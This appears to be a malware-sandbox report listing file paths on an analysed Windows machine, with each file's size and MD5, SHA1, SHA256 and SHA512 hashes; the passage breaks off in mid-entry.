65119aa2830d17f31bc45ca0145095afefd4d810465408003502600b69ceaee8d8aa32c4c713d9306cfd0ab5b5dac13d0142e4d2dee97a77ff2ca1ef8c738e63

Download Submit
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi

Filesize
180KB

MD5
e7d2b57c989797c1cb8fea8738cc1e29

SHA1
cb43036d30bc82983bcffebd8924548934cedeaa

SHA256
3bab370295522a96c7ec1f45eb989bf0b8dd9273f6dfa2820d0814043ecd3722

SHA512
f5ff7e3e87f738a77eb6a8d9dde2d85dd1ae35d37e6af1e5f3bc2658062a3099ee04dcb96ab5f8a41a2a098deb62718540907a8ed3c992eedb6a8975b8f4237c

Download Submit
C:\ProgramData\Package Cache\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}v64.8.8795\dotnet-runtime-8.0.2-win-x64.msi

Filesize
26.2MB

MD5
68438774685b23d32bd8b749f4f4c1fa

SHA1
0c8a1e9fd8b8d37518e27d72fd8138ac90013524

SHA256
3a1acae3a5bd1ef492394e35491e28d6783e32a7e9209296ac6f795e3d1b9f01

SHA512
ce8dc324d9d334f033f237f4668ed80ca347f076111aeaac2213558da129126a3fafe16e3a36d89e1e5b2907eacff90a620e504c4b01e9bcd68eafc7222b0562

Download Submit
C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab

Filesize
1010KB

MD5
a2a09ca1bbaf4dbfed553ecfb757c38e

SHA1
e9c1cec5cd45a194705a7ad74fe347a276a2da29

SHA256
aa4beddab6100b93430c7f08ddad1b3fa40ed6eac3eb951d2124309e18d6c3bb

SHA512
39f08842801e71a2ef1ae67b4046523ac58170df12e8ee3e6e093277a2f0361b3952332b403fdec99b3dca3bfbc34e427004470dcee2525a2b9e0a79ea10a7f9

Download Submit
C:\ProgramData\Package Cache\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}v56.64.8781\dotnet-runtime-7.0.16-win-x64.msi

Filesize
26.0MB

MD5
105f026dae350df52f05ac3d8dcb62ed

SHA1
3d11e4cf83eae3b4433f652d99c4e070f26e435d

SHA256
60fbb22bd3d7c143134457a12b0bdda21bf19f7ff83d6b56cef46378a8198ec2

SHA512
881d16b494df4c2b2d707db85e72638dac718403a1a3752740e6def61bfd96b70fa858d5a57b663acc8155c25543e2d48966a0c6ac1c77040433159dce55cdd3

Download Submit
C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab

Filesize
791KB

MD5
36b4c2c4d7c1b084ed65a37967bee6e8

SHA1
31eb1e0d91534cdc35350bdbe275c73312ca805c

SHA256
1b694f810082178474acce09c20f01ecc7fcaa98386474ed7a01845ce8e724ca

SHA512
4aabc0b864992e59d7596fa621ce803e9e77bde7d3c24717df3e84aa4dced1d6f1d90d374f8382f0e714bd000bbfa307bba7552f7676c5fdb6b33029772fa692

Download Submit
C:\ProgramData\Package Cache\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}v64.8.8806\windowsdesktop-runtime-8.0.2-win-x64.msi

Filesize
28.9MB

MD5
8cccb87ee5357e797acd4a9681c7771c

SHA1
7de1f17985e5b86d0ce0eacf0a72007ddb0adf39

SHA256
ab30cf3dee7a9d167c556dc6e2e8979a4097ef19cd7db9c87e0a213f2945c63b

SHA512
be834e1284858735cc1e44622fa2b38df506435eec5fa2bf8c15b3767c5154fde08b236e5c469efde72b5969b75cc9b4ad1736052cf17991349a3b9758e03af5

Download Submit
C:\ProgramData\Package Cache\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}v12.0.40660\packages\vcRuntimeMinimum_x86\cab1.cab

Filesize
974KB

MD5
e4692f74e03a4fdbbd8de0faa3bf24bb

SHA1
5e839bcf2b67bdf9034f99a6bd2dda7385d36ec3

SHA256
2b26aac569ee62a9cf284185f29ed5d42513da3f11da6d562f041ce853c554f8

SHA512
010eb9423a5b90cfd928240103954f171658890846e9269fd2ea75a43c4869a639032980e9a0aeec1ef22e2ebd0d2c522a3b7a87c05da5208c446f2ab8a75df4

Download Submit
C:\ProgramData\Package Cache\{E634F316-BEB6-4FB3-A612-F7102F576165}v48.108.8836\windowsdesktop-runtime-6.0.27-win-x64.msi

Filesize
28.5MB

MD5
3ca574fb3c3a0ec44be3f39cecc1cf5e

SHA1
4765982fd561dc962af7645fdcd891e14fbf4169

SHA256
f8efeb035cd08d60c650880ebd2329e1190ba7a884b5cb22c7de73aa4d0ca909

SHA512
834adfacd09f85fe88ff3060cdeb7b311103ccc3bdf2b9804cd6e95bbadb26ee1e0812226932b04c0a9ba3f5079279461832331ec42294285e28e20ed84feb63

Download Submit
C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\cab1.cab

Filesize
742KB

MD5
578bebb08129543b8dd57ecc7a5a9600

SHA1
fd428949e9a3eac25a31353501b25caac7e67587

SHA256
3587851542c3dd890dd4beccb11842bbd7dab9dc764d7e01d3f2e6f3e01c4202

SHA512
f10ce32967b3d8d8e5b01942223b8bc7530e22fe3d1281cd1e1fa7b3970e30c8c9bb7954ebc869fb0454b5b8ebf091a8b57f87e7cdc393efafccc98a035451ee

Download Submit
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm

Filesize
914B

MD5
d629d8ad3c9bef5315e27df60de7dad5

SHA1
4061c16a9bce76e9d0f536f9407284c740d5b4ca

SHA256
f3136606b435805358995529ae88b2ae57efe112fb7a747d92160b82110d47e4

SHA512
15507e323f3710c4171f7abed0311efceefbfdeb412b4dba3f87113976d617f7429d876a790569b4f6fcd685049f45df688754b9b155d3bf8beacb05a66675b8

Download Submit
C:\ProgramData\Package Cache\{d87ae0f4-64a6-4b94-859a-530b9c313c27}\state.rsm

Filesize
1KB

MD5
84dcd02623625d980293ca76dd814810

SHA1
d752d3aeaec69f8789f3c5882cfda188f7312d1e

SHA256
d08ee1e1810ba7a14d59907b744e92c496143c9db93759e4087257f2e439f4f9

SHA512
4650b9fb77b3d866caee0f65bc11f1847a981ca6a62e2cf53f3332f2e7721c0e9633761fb1461b40d63a459f39cf745b71a88effc920c3634f6a5b654c1577fb

Download Submit
C:\ProgramData\Package Cache\{ef5af41f-d68c-48f7-bfb0-5055718601fc}\state.rsm

Filesize
1KB

MD5
5982d0022a2bb982ef12a5d7f816e205

SHA1
deebbec44450d2d22dd622140ba96340356e5a97

SHA256
8cea1510ef09ed5d69398663545c2200b90e72b697f3b47185763dda89165c42

SHA512
2cfea17f89cf6fcfa4ead8e6f6f8fe3e8f01800278915d40cf344bfdc1b00af00b25c45ad228e4c4f5fd47e1b0f374d594bc78980e737fdfd1fb4aab1c6d2932

Download Submit
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm

Filesize
930B

MD5
e938295220740462951fd6f52088b116

SHA1
c122a182f61bdd2223da05ddb1739ac7f4ed28b1

SHA256
d0ba4fadd8a00497f152d2b5e7ec2981651d8896ebdb69e6959200e8de60679b

SHA512
dfcfbdcb7e0439bd9c9e14f1b2154f70b5c8a9c380358ebcfad8e8e75a180e9f76068a559474f447c7d946c3bc3395d7a12546fd854cd1620612fe827a5a741d

Download Submit
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag

Filesize
1KB

MD5
62eeb063c3dffc1e9fac1e4889c0c46c

SHA1
63e07b481b30ab3386e541ce5c78dcf626663fdc

SHA256
ed7d155de2ccc1c6addbc6f0f356db9ad8636ad6ce81223124b37edc2ad17005

SHA512
989ea0dbe6586563c338b78365514162b2eac30e530c61ab57e05adec335459396a9e931646b8631a9e204ec09102686c50b46039cdf1336c4733efbe0f718b1

Download Submit
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag

Filesize
1KB

MD5
84d1d8b99689544946b53fa6b268feea

SHA1
9a5756c96454297b958bcf19af5f2744b490ed17

SHA256
ddf8dffd353efade9d972377c92a2c11ecff34012b43f138bab25fd35277f770

SHA512
bc9092477d0523b44b537e27970133e63eb106fa36f62a89677652e026dedd4f09184f1d35f56c26072f5093d321592ac23c59da2023d93f23aee00045134a5a

Download Submit
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag

Filesize
1KB

MD5
d383b8f085254935cecbf8b554135b9e

SHA1
26fe2e37b657cb27966e6f2bc2965255fd72c9bd

SHA256
226683058c6442d126cc37a56eaa62c07edaea7daef3a9309883791bd03c80a1

SHA512
c883391895054098e2e49abc1afc367bebbff78a598fe9f66cf8795748a3abdbc5572bcd4a953c4dea33e88a3cfd36c9c95cb58fe802cd4dbd5d04e022c2208a

Download Submit
C:\USERS\ADMIN\DESKTOP\ASSERTCOMPARE.AAC

Filesize
164KB

MD5
c563841fd4b23cc652a1a7dfb13ee9e9

SHA1
c4acb35dc945a70ad91070f8f2e92a28726d1bee

SHA256
9cfc83af795b4c077e8a0695798a8257d32663aa0e8f0b49a709fb2f3d213b60

SHA512
d6801337051222005bf69388fbae86ca86d02aee8fbba639cc5fbac5efb36f58fc22f0e038d58dba433a62f69a6ea0f9cdbc99f44e1385eaa65405be9d664536

Download Submit
C:\USERS\ADMIN\DESKTOP\ASSERTREMOVE.DOCX

Filesize
18KB

MD5
3e2c303aa4e497d6281dd432cad71eee

SHA1
09d90e11b6643e686a975ad2cd83cfbd3abc8f06

SHA256
7ebcc43d5e539ecf84e16f5a9cdf6ef29ef222333dd854bb189332ee1d4dced0

SHA512
fd1fc45475ba81437e5b073c5a348cf90920e0d707624ff1310c6b719f5b8b0d9d3883ea24d153ccf92c82a785ef7ae64e83a16fe5be570262185f0df14dbc72

Download Submit
C:\USERS\ADMIN\DESKTOP\CHECKPOINTIMPORT.DOCM

Filesize
237KB

MD5
1541cad6af71c43e773841a4a97f52bb

SHA1
0f17b7942f5e7798c840de3e1202901d176e68a1

SHA256
634254881f08594c61bdc875dd1c21b03b60f4ebd607a64820ecf58bd8761d46

SHA512
b33783c5a80bb61c7fb0cce4ecf257ba10535eb28de5d98bf0a23ee282fb26709c81cb0154923204e6f85c64787272cffc8505377657a7772db87cc35d14a9cb

Download Submit
C:\USERS\ADMIN\DESKTOP\CLOSEASSERT.VDW

Filesize
106KB

MD5
4bad788f1e9c8b22d804eb99044b9334

SHA1
3cc469470c255e77ca1af21c18f5294df490962d

SHA256
7285f8db379f3d2116510419ae1a9e671bed24ab03583a7b0928f03c36e98429

SHA512
86eb81f3a18b9a1558be4af434aee0c3198a74f1c67239aa0f6673784e4e294c99b3818e7abcb807a3f164031f95f76a6cbd06caf648db6929fbf44c64c4e135

Download Submit
C:\USERS\ADMIN\DESKTOP\CLOSEEDIT.3GP

Filesize
142KB

MD5
b281d83f8984dd517b890c48c2891d48

SHA1
e46d4ce161af9cf575e25fed75c6749d70d8b22d

SHA256
7d1193554f42a165d1a6862a16ac491d91896d0fe2d2e60fdf321d4b973c5fe3

SHA512
c4c0143d46acc602e2789850caca7532f745db182d1e3d56afb71d79e2decc3f89642b3fb78ba0251b6123297d60657fa58aa2cd96c188e81797063e6b70805a

Download Submit
C:\USERS\ADMIN\DESKTOP\CLOSERESET.MPG

Filesize
252KB

MD5
e757f6319c6878f280170d09bbc45230

SHA1
579faad6cf532c458a119cc46ad40ffd30d27851

SHA256
aaea4743fe04efeac22db8221805f4e1ad05bf855b1aae7c13f63b5a74593450

SHA512
d43778acb2dcf5619a34b3d2bcb2a80cec886bd30a5f1a214a7ffda4ad720e08bda44f0feaada146a9493686e0ff44bd55a317fea0718e1a50e826b47b750704

Download Submit
C:\USERS\ADMIN\DESKTOP\CONFIRMSELECT.MP4

Filesize
416KB

MD5
4e88cbe87b1201374d19060e8c2f22c7

SHA1
8d8b8b6f9b4867bc85f95dc39119b42a677f627b

SHA256
13de7a68898933ede4e49e6275e908f37f1653d21b21173eb5432b13793b47f6

SHA512
2a3b32e16240cb9f1809c289e7f27faedd0aa75679be6103e2470cac28c0f79e5816bc6e9e2efd811c3c56cef38779efca6fc849ab4479cd4fef80b4484c311e

Download Submit
C:\USERS\ADMIN\DESKTOP\CONNECTSEARCH.EX_

Filesize
128KB

MD5
6d507ebbd6d5e8ddd6921ff69eea7b90

SHA1
fe7ee89e76491af6401650f0474330cb6d4f05ed

SHA256
ef9ad64b59d7cf6dc2dddb552cf14d2b2e88c8efeb27544eb996184cb712c1af

SHA512
6a8c5859dc6edfc9cbe00eb84fb49e5186e19c3fe041d4bea89f694d3ff797b0576a47ddebe75471b7906156e241b014e8ca899514093657513ecf9771252743

Download Submit
C:\USERS\ADMIN\DESKTOP\CONVERTPOP.MP4V

Filesize
179KB

MD5
85a81f9136deefd9a4b183183423cd2d

SHA1
1381927825931e9f82f8c7d7fbbc828434a69b85

SHA256
e64f018444d074072395fc058f0e418cd66a3a9737cb6f54c73525f1771c3c9b

SHA512
2f46d538d15ceeeb0ea99f4c15788a9ed115fb3b15913581358d3f681d3f50b3ad1b5e1c4bd5e014364764e185268acd7ff1053adea125b81246f47c21be4f9a

Download Submit
C:\USERS\ADMIN\DESKTOP\DEBUGOPEN.M2T

Filesize
303KB

MD5
f2f8a21eb24acd7ac3d460df188fa4bb

SHA1
d382e640485730677eb0f79addba3bdb393dafae

SHA256
6b8d8e8e2e47ff5909d75a49e8e769e79f8fab40e4a3e848cfbcc20ccb6d589c

SHA512
e0f103facf2c0069245609f9530b9521aeb261c961c4e9d5811b6173af2f87c7e951208935744a870f11da1629624c03ffc36224b98fa82824542f0578616d48

Download Submit
C:\USERS\ADMIN\DESKTOP\DISCONNECTREVOKE.ZIP

Filesize
223KB

MD5
546c53c83c7b211b531d8a3b20d1f3ce

SHA1
03e5f893b0a82db4bfd905120780de3cb669b5cc

SHA256
3d4fe0e802404fb01f6db5e100f0bcc9d2f348dd468c71e0ef3a734178947f9b

SHA512
4211782f6533af949481fd26b9339eae6512b79aeb6a92ed4beb8599c8c76c3c709eaddba2e51d7684991f17af6fa2276d2dd59a7e67d41f98b6028e6d9fbd2c

Download Submit
C:\USERS\ADMIN\DESKTOP\EXPANDBACKUP.VBE

Filesize
281KB

MD5
b678b650200ab19986c1b88c21d9e08e

SHA1
7234f94e2170449d8ac898753d0c43d3415ee157

SHA256
93aba413037cda0d62a56954a32ce1debefcbdf2f7fce423c83ec98e4a29921d

SHA512
1e2c5d92810003e2591ece13466737c4deea14a3ea818e5e4cacdcb67ac85aacb0469d4b18d3be31feca6bcc0bba93ce457d1cc6c5f27eec415ce37801e464e4

Download Submit
C:\USERS\ADMIN\DESKTOP\GETMOUNT.WAX

Filesize
288KB

MD5
3f8a4396b50c7a75a8393fdba6c288dc

SHA1
12946264691f275748bb0189dc50edbbf2e26009

SHA256
18f52f839a8b2ce4ef84e943e290fae8d4dfced08fdc010cbb1d8cb33595ac7b

SHA512
65a4d24542488b2ff595b2af5505b64c4c762dd24e0aeb0a4cabdcd3a12f7069b5bcfc5c7d2c5da2478506da30a466e8429963f52fe647c41f9577489890af3d

Download Submit
C:\USERS\ADMIN\DESKTOP\GRANTPUSH.VDX

Filesize
135KB

MD5
d2f25b74d9d048ff3147f4e89165e7e1

SHA1
55279c6b48a51c6ec4a544d078a53371da33e0d6

SHA256
e61e07f8ce66a77847f92f94fd4c000e804e87d36cad7627411fdd56c1b3c632

SHA512
1937e3ff93d33e08c457f605b4f3209daabf7025f8be7d1b8061fdca4b6f5ecd2e564d4de59ab6e598a53e2d468bf93bbd9e16386516e400bd2c1210cbc069d1

Download Submit
C:\USERS\ADMIN\DESKTOP\LOCKTRACE.DOCX

Filesize
13KB

MD5
b28bb3c191b14a65e09280fba8d112f8

SHA1
957f5df0307aac7a9af65db23f9eb1f7841df17b

SHA256
05630b062f084ec35043861bae7465afdaa4feca61f13cb1fb2b9ae37e137f5c

SHA512
68a2351ca550a300cf2fb8bee6da82e7a4736049e2cee9369be3f50e8cd53142d2af2ab0ef4c23822eeac0ee9a2cd9d37e27a620a3a2e6a650eed83384b6d9fc

Download Submit
C:\USERS\ADMIN\DESKTOP\NEWINVOKE.REG

Filesize
113KB

MD5
a7488cd7d88d74a0b0c0e76572ed4886

SHA1
6622ab517ce08ab02f6f191c46f524c6d97075da

SHA256
e4e5ac0283f5a51b0df9cad70cc157b20e456e7a892804ada7aa3cbd4a292d8d

SHA512
a7a1b652965360a5fa6a829173b1eb7d4b2879d306f22da4fe5a76414cd1316f1926f4023332cff1898157a2864249a213ee8b9462ad5e7124564210eb09b598

Download Submit
C:\USERS\ADMIN\DESKTOP\OPTIMIZECONFIRM.DXF

Filesize
245KB

MD5
ab7cfcd21d88992ea1ab496789c5ea67

SHA1
71255636501392dc31a36ee4d1af8a8926a73900

SHA256
153712d6b4633dd6ff4d0364a66a66530520243f08bd3915898a6c6f68fca03a

SHA512
2dcb6e0c375f6e17c6f58315c1573cce816785f40a2bd3d38b03e92be55c48ac79b5b0ea507c157c6584388158604a4cf74658871d5f14c1a62895b7cdbaa7a3

Download Submit
C:\USERS\ADMIN\DESKTOP\RENAMELIMIT.WAX

Filesize
259KB

MD5
bb55301906ec8a47f3820c4559ef4201

SHA1
0f9abf18df7ee457c54694098fc6abfed6b3c903

SHA256
14b90aeb511614e2571ca7bbdf59720a40f5d2138d08759e4013ee85a0df7cce

SHA512
c641483fc625fb750b9c0ca9c20d2b43b71bc27bd9c4463e09c5cc01d1386ca112562558c226366fcfee94b7f6f9987f860552c0cfb5b0e5ee4efff7b1442ebd

Download Submit
C:\USERS\ADMIN\DESKTOP\REPAIRSWITCH.VDX

Filesize
296KB

MD5
059d6921f458907ca02984f032d4b078

SHA1
085f3be445affde7fde57c266ebd4688c1eafe8c

SHA256
bedfc452b434a290d94135297ed73981c6e0b3bf5d1cde6153c07ee5113e78c0

SHA512
93f81b0d2fc5bfb9b8463449330f8a331990f8b49511281b2e0adf38c83aef3a30500a025e2513e071da2225b45f1e78f76764282a64a4e754511cdabeba9f01

Download Submit
C:\USERS\ADMIN\DESKTOP\RESETCHECKPOINT.DOCX

Filesize
120KB

MD5
99743ab15e599ca6650355f407e3a747

SHA1
0d313eecd6110d32e37214e1e408a4c287ebed5f

SHA256
0513659702db3aa48e3527e52073b8a40cc00109ef44fce9e3e1b23bd08b8ad1

SHA512
5863393a1795e917b6b311efbd67815fb4f3b46be25d1f1c44cb428603eef0d846aca2e31382d6a70ce775aab09ffac6b989737d502230d3eb2d82942685daf1

Download Submit
C:\USERS\ADMIN\DESKTOP\RESTARTSTEP.HTML

Filesize
150KB

MD5
51506a1a2c7d49dc65c591e6c9a7ada8

SHA1
7d255c00e1b02d855ac468d5ba6454a14e1c486f

SHA256
32b40e718b7c0e04a13bc5dd0db26aaf9450afd0ff5dc00e13a0d3f661d7a6a1

SHA512
b0c40387d303f806914ce3cd30d0180785182a4d1a2058143a86e93a5618662c32fac28e921af9ef08b35143f2d71cb051715c1e5d4de5d24ef8fd964e543ff2

Download Submit
C:\USERS\ADMIN\DESKTOP\SENDCOPY.ODS

Filesize
266KB

MD5
a28f0d30de29a61a613a2b393d415b7d

SHA1
5899d613f9c3ecd989842f378170f8e160cf6347

SHA256
5c2a851f0a6b252b6d602edb82e4bac954bc04192c196e67f30c2ad5ffb5f072

SHA512
0b93c7c6be5877ca1d7dfe3421e9f80a6e32f0430fd601eacbd5485b3a9d0f0f2afee2bc2ea13d6087574f48a865ad631877b6396955464aa8e4d628047a1120

Download Submit
C:\USERS\ADMIN\DESKTOP\SETEXIT.M3U

Filesize
208KB

MD5
70ce892163f4d00826b233ce7b9ae7c0

SHA1
ca193851f8e207039eafc37b7ddedc4800d7fb4a

SHA256
1d895a0c2101ac5d2610cd9eba2e18e60a1cd70611d15bfd487b832fff3a824b

SHA512
867742efff429da7b6186ccbf0bfadff9e3bd1d923a4cc88ab4ff1fccb5af6c9d03087c7be90fc507087303926027fa7843402923f44e133cc4a11b78cf45a7e

Download Submit
C:\USERS\ADMIN\DESKTOP\STOPPUBLISH.ISO

Filesize
201KB

MD5
664913dafc564f6cdde8a7a06a77cae0

SHA1
fdeede45325109575a1aadeb692e745dd464da31

SHA256
21ee38530f63e1869f0f50546b313b44eb2bc7705bcea4d3269bb3d726e4c698

SHA512
c7993735fa96d864cf457ea249deb57ddfd0d2afe56f894c8c6ba76ae18c4ba59523489a002b03dad86438ba337144357533ba557352a412ee63acc798a19a79

Download Submit
C:\USERS\ADMIN\DESKTOP\SYNCCOMPARE.WMA

Filesize
274KB

MD5
1102bf576135fdb9a4bbeda14fde29ba

SHA1
fa7fa32b2595812cd9ad48e959fc15a9c7988b92

SHA256
1fe18a98d2ec63c286b750ca243ebe0a692732eed687bc214777f009476369e8

SHA512
f77da4ee140d668e669f91ba9640db017f08bfccd3b3dd6f7734dfbf2fd3dbe4d70485fdcec1752467989b9909f0939170028fd5e7c9d2ff080c24003d9046a2

Download Submit
C:\USERS\ADMIN\DESKTOP\SYNCMOUNT.MPG

Filesize
157KB

MD5
8831230a8d02a6963dbabfa52a22e559

SHA1
951f609b92d7a2a9765748fa32edb340b2a380ce

SHA256
af1fed98bea01c7d895c738dd6be5bd03b8aae26a3c60d3a87875563c67cad82

SHA512
a9a6aa876b682121012da69e98ad8e7f1db97248d23327717ec80c0ed30a1b0d4d9ea8e475e114598b0ef49cd31d3e63c8e28cfbc1ff918adab0e528c3061899

Download Submit
C:\USERS\ADMIN\DESKTOP\TESTLIMIT.EDRWX

Filesize
186KB

MD5
c8d80c810ef9716902b448b1e613afb1

SHA1
25d2b33399ead68dfd96b2990756bef0af641095

SHA256
63a226aa9306337c6a23cc697990a557db7aa942eba3abc24f045dc1575e83c7

SHA512
60a5dc3eb3c9ce31b1780f7f5a481a165d11c1838a3953fbb475e64557548aad94d76d7c659525c0e69aca883076390f57917b14223f5e6c2ed62fb69f4f3393

Download Submit
C:\USERS\ADMIN\DESKTOP\USELOCK.VB

Filesize
215KB

MD5
80860748ca85855fcef692c3cda14abe

SHA1
744358beb772ca5e0a0e1a299f8e43e0bf5bdb3a

SHA256
46c3304e0e15089fe190ee2dc1129f787397f886510b4cb63167ab0bbb4f95ed

SHA512
3b510b71de8b270a12a272bfdb6a2beba86f160f9ca73965e9f2bdd5d7b13d91095ffa1b4817d871db428b4b450812a9d9a254ea0c25beab6834b518d6a9f240

Download Submit
C:\USERS\ADMIN\DESKTOP\WRITEPROTECT.TIF

Filesize
193KB

MD5
da01c3167b8cdfa9354ac448a9964339

SHA1
ba13fcaa8c7e7249c526caff0c011635b47f8d48

SHA256
d73f1495340cb255d49c69ca0240c902289d0e864f14c562448d9e336ae5d18c

SHA512
0924dbe3dc3590093cb82bed78ecc4bb4ea4305cd56248717be70a357dbb561794992fe235f93713caee3414b5d3adbc74857d6bbefba31c299ce23bf60dfb99

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
754B

MD5
88d625e4cffdeed81cfe8781f4e7640f

SHA1
68abc4bb33650fbaa8b6a0a6fa9ac3238e318cb3

SHA256
cf9fd589d1bbb05e590c8eadd4e8665b774f0b14e17f788585ef5d56f481a000

SHA512
081676aa870ae9505b8ec5890c3efbf07c878c790a58493a0fb15dcc105e3aa6896045d3e04efc021cc65cc3ef284565bc1686fceed1cf0cf2649f29940cac38

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
471B

MD5
8f329eacd0d1015bbdb6d5374f43b07a

SHA1
a0c21efdeaac90bcf6514124fb39452b777d4e45

SHA256
23504bd776cfdd254ab5b90b74a5b458e9846ebf6433317c280aa3091959454a

SHA512
0e3a8780a3634c08113d0466288ccec8888b01b7e843b43a177ef6a6344f114e9297610bf83ab42b48b66eddcb7f3867e7901b8837c82704a8c9b4ed05226471

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
690B

MD5
a1207365f899a138e371fc4fcb94ed5e

SHA1
0044a7d4d7b5c50825c17e9c2a94b5223c1982f5

SHA256
eee61f8057723ab8658a193c440089086150c64d3e8a9c72644e91d053bf5ef0

SHA512
31aad46b3f4d4521e9a1fd926c64915dd2cabe5abf4aff82b20d6fe59a05600accf0b638b876dd767fe05a9f99fec946864c74a6fd53f3f313b60848e0a8bcb4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04

Filesize
412B

MD5
cff368ec96f43ed2723011583a585a03

SHA1
5d8fb68e0396c1471ac693b0defca49bc68e1ea0

SHA256
7e5172e8c2c9ff2e1326b4d5d1325c3207b107a446b31279684a529420fd706e

SHA512
21569c45c19df63af48e4b3ed7ab5092f7781eef4d655bdbfb8d4a246cb5c5a70f673f9a4cfd8bb0c76cbf26c1771f30d7abb2a53b2989c789f249b41338cc70

Download Submit
C:\Users\Admin\AppData\Local\IconCache.db

Filesize
14KB

MD5
f2369e302c79703141c4613cb4877458

SHA1
03f9df4e445db1c791fb70c34354277ab8ad5e74

SHA256
0129a7d204425f2dec0100ec3260e65d286b44e3d5c9db8daf079e9760eaf8a4

SHA512
7fec5ba084b1bd0b93b5acce93500526ca68e0d566e72fc50c25d6cfcf5f7bae3a34dbcb88ff69558dcf9e92742a3a88006b06887e11bcf438bb9dee2092ee8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
1c9d351461442e74d298dfcb1dd56a9a

SHA1
447962889efa647f9cce7eede0fcdd26ce4817d2

SHA256
b6fdd3edf10d8508dea31d250f7b05a3b418bb157febc2bccee3823a74276ebe

SHA512
290a879cf82b8e16a27cf8c9234b1ec629ae084ab2d69342c7d4e263f99514e7477dde3ef5450325166eee39d3f9c0dd44f90342b2f224f504b14b1eb0560ee0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Filesize
1022B

MD5
76b69d3521d84557da1e65c2941d734b

SHA1
bbf30c56a8f315c2228eb4e37f2df084427160e8

SHA256
63141271cfac3101c99543b052bbc5e02e1bf0a311e2548b4652315f4221f8c0

SHA512
87584747f8a3ee1d19a45484d07d0f2c33dfd0151aec7eca4dbab1ecf63094c3f4d879311a71098bc13bead1a136566cb00194d792cdea417f0bc7b75b62fd53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk

Filesize
8KB

MD5
6382e1d18bb649a81b11c65a0acac5e3

SHA1
979a59cabcacb6b7f9a125f006ba1499da9dca24

SHA256
ec304feda84a88e0a2b636d7529bc9f755ed29f8f8b6fd02017eb7e6c9b25b2c

SHA512
f30371c03259cd631b31053211dfe0e784ca543b7e7768d5bac1ff3747fad96327d2f5e302f65953f08ec2bdc303b2c6f7d3d3b0708514489933ce8dc29035f6

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\YCLWQ4BV\microsoft.windows[1].xml

Filesize
97B

MD5
781c2d6d1f6f2f8ae243c569925a6c44

SHA1
6d5d26acc2002f5a507bd517051095a97501931b

SHA256
70687e419879f006d0c50c08657c66b1187b94ea216cfe0a2e6be8bd2de77bc8

SHA512
3599fa8f2ffe140a8f68ec735810d24a5b367a9a551d620baa6dc611ca755dce1a662bf22b90f842d499d2c9530fb8acd634d1654d5e2c1b319574cbf35eadf7

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133797090658575937.txt

Filesize
75KB

MD5
cd76eb5c2bc733b22668a0ec6a141aae

SHA1
b8053fd6cb1aeccc8c4ce976cc1343dd22c34739

SHA256
727ead6c23c57d65b5f59f65ade1aed3385e6439b9930bf4a838f4f396d5ef05

SHA512
25c7867e161886cb2ff3af80461fbd176bd712b80727e59e108da6f9327c5960d83fe455ca41c600b852d0e377c3ef77869ebe30844554e2a7edbc64ab1655a3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\08e575673cce10c72090304839888e02_4304acb9-c3f6-452a-9860-eb4e85d38d4e

Filesize
52B

MD5
93a5aadeec082ffc1bca5aa27af70f52

SHA1
47a92aee3ea4d1c1954ed4da9f86dd79d9277d31

SHA256
a1a21799e98f97f271657ce656076f33dcb020d9370f1f2671d783cafd230294

SHA512
df388c8d83e779e006d6311b2046fcf9259ec33d379fc0e2c6a4b6b90418f587a12c5c23acd488413a02568ca2d3effe04608ec7c791925c7ed53dc71093ca45

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2437139445-1151884604-3026847218-1000\08e575673cce10c72090304839888e02_4304acb9-c3f6-452a-9860-eb4e85d38d4e

Filesize
338B

MD5
fc91658bb81ea407fd37a59d65f0d86e

SHA1
6cb269ab1a592dfd2039dc8c50c00b86af94d3e6

SHA256
